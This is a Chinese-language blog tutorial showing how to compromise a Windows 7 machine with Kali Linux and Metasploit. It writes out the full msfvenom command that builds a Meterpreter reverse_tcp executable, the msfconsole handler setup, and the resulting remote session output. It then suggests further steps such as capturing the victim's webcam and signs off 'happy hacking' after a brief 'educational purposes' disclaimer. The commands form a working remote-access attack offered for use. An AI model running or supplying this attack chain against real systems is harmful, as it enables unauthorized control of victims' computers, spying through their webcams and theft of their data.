如何使用 Kali Linux 黑掉 Windows

0

Metasploit 项目中 Metasploit 框架支持 Kali Linux 平台,Metasploit 是一个用于开发和执行安全利用代码security exploit的工具。

wkiom1ilpigxqrkkaabllxwxstm238_jpg-wh_651x-s_331606554

Kali Linux 派生自 Debian Linux,主要用于渗透测试,拥有超过 300 个的预安装好的渗透测试工具。Metasploit 项目中 Metasploit 框架支持 Kali Linux 平台,Metasploit 是一个用于开发和执行安全利用代码security exploit的工具。让我们来使用 Kali Linux 来攻破 Windows 吧。请注意,我写这篇文章只是出于教育目的哦——一切因此带来的后果和本文作者、译者无关。

源机器详情

Kali Linux

  1. root@kali:/# uname -a
  2. Linux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux
  3. root@kali:/#

用做攻击对象的目标机器:

  1. Windows 7 Ultimate SP1

步骤 1:创建 Payload 程序

Payload 是一个类似于病毒或者木马的程序,可以运行在远程目标上 —— 为了黑掉那台机器。可以通过以下命令来创建 Payload(program.exe),以便能使用 Kali Linux 黑掉 Windows。

  1. root@kali:/# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.189.128 LPORT=4444 –format=exe -o /root/program.exe
  2. No platform was selected, choosing Msf::Module::Platform::Windows from the payload
  3. No Arch selected, selecting Arch: x86 from the payload
  4. No encoder or badchars specified, outputting raw payload
  5. Payload size: 333 bytes
  6. Final size of exe file: 73802 bytes
  7. Saved as: /root/program.exe
  8. root@kali:/# ls -la /root/program.exe
  9. -rw-r–r– 1 root root 73802 Jan 26 00:46 /root/program.exe

通过 ls 命令,我们可以确认 Payload 程序是否成功生成在指定的位置。

步骤 2:运行 mfsconsole 命令启动 msf 命令窗口

  1. root@kali:# msfconsole
  2.                                    .,,.                  .
  3.                                 .\$$$$$L..,,==aaccaacc%#s$b.       d8,    d8P
  4.                      d8P        #$$$$$$$$$$$$$$$$$$$$$$$$$$$b.    `BP  d888888p
  5.                   d888888P      ‘7$$$$\””””‘‘^^“ .7$$$|D*”‘“`         ?88′
  6.   d8bd8b.d8p d8888b ?88′ d888b8b            _.os#$|8*”`   d8P       ?8b  88P
  7.   88P`?P‘?P d8b_,dP 88P d8P’ ?88       .oaS###S*”`       d8P d8888b $whi?88b 88b
  8.  d88  d8 ?8 88b     88b 88b  ,88b .osS$$$$*” ?88,.d88b, d88 d8P’ ?88 88P `?8b
  9. d88‘ d88b 8b`?8888P’`?8b`?88P‘.aS$$$$Q*”`    `?88’  ?88 ?88 88b  d88 d88
  10.                           .a#$$$$$$”`          88b  d8P  88b`?8888P’
  11.                        ,s$$$$$$$”`             888888P’   88n      _.,,,ass;:
  12.                     .a$$$$$$$P`               d88P‘    .,.ass%#S$$$$$$$$$$$$$$’
  13.                  .a$###$$$P`           _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$’
  14.               ,a$$###$$P`  _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS’
  15.            .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==–“””^^/$$$$$$’
  16. _______________________________________________________________   ,&$$$$$$’_____
  17.                                                                  ll&&$$$$’
  18.                                                               .;;lll&&&&’
  19.                                                             …;;lllll&’
  20.                                                           ……;;;llll;;;….
  21.                                                            ` ……;;;;… .  .
  22. Taking notes in notepad? Have Metasploit Pro track & report
  23. your progress and findings — learn more on http://rapid7.com/metasploit
  24.        =[ metasploit v4.12.22-dev                         ]
  25. — –=[ 1577 exploits – 906 auxiliary – 272 post        ]
  26. — –=[ 455 payloads – 39 encoders – 8 nops             ]
  27. — –=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  28. msf >

步骤 3:进行漏洞利用的细节

  • 4444 端口:你可以按照自己的想法来选择使用哪个端口
  • LHOST IP:表示 Kali Linux 机器的 IP,这里是 192.168.189.128。 使用如下命令来查看你的 Kali Linux 机器的 IP。
  1. root@kali:/# ip r l
  2. 192.168.189.0/24 dev eth0  proto kernel  scope link  src 192.168.189.128  metric 100
  3. root@kali:/#

现在在 msf 命令窗口使用 use exploit/multi/handler 命令,如下:

  1. msf > use exploit/multi/handler
  2. msf exploit(handler) >

然后在接下来的命令窗口中使用命令 set payload windows/meterpreter/reverse_tcp:

  1. msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
  2. payload => windows/meterpreter/reverse_tcp

现在使用 LHOST 和 LPORT 来设置本地 IP 和本地端口,如下:

  1. msf exploit(handler) > set lhost 192.168.189.128
  2. lhost => 192.168.189.128
  3. msf exploit(handler) > set lport 4444
  4. lport => 4444

最后使用 exploit 命令。

  1. msf exploit(handler) > exploit
  2. [*] Started reverse TCP handler on 192.168.189.128:4444
  3. [*] Starting the payload handler…

现在你需要在 Windows 上运行 program.exe,一旦它在目标机器上执行,你就可以建立一个 meterpreter 会话。输入 sysinfo 就可以得到这台被黑掉的 Windows 机器的详情。

  1. msf exploit(handler) > exploit
  2. [*] Started reverse TCP handler on 192.168.189.128:4444
  3. [*] Starting the payload handler…
  4. [*] Sending stage (957999 bytes) to 192.168.189.1
  5. [*] Meterpreter session 1 opened (192.168.189.128:4444 -> 192.168.189.1:53091) at 2017-01-26 00:51:31 +0000
  6. meterpreter > sysinfo
  7. Computer        : MANN-PC
  8. OS              : Windows 7 (Build 7601, Service Pack 1).
  9. Architecture    : x64 (Current Process is WOW64)
  10. System Language : en_IN
  11. Domain          : WORKGROUP
  12. Logged On Users : 2
  13. Meterpreter     : x86/win32

一旦你得到了这些详细信息,就可以做更多的漏洞利用,或者通过 help 命令获取更多信息,以便列出你可以黑掉该系统的所有选项,比如 webcam_snap 命令获取网络摄像头,同样你还可以使用其他更多的可用选项。祝你入侵愉快!!!!

头像

Focus On The Network Information Security.

作者主页 邮箱 微博 腾讯微博 QQ Twitter Facebook Google+

发表评论

您的邮箱不会公开,当您的评论有新的回复时,会通过您填写的邮箱向您发送评论内容。 必填字段 *

返回顶部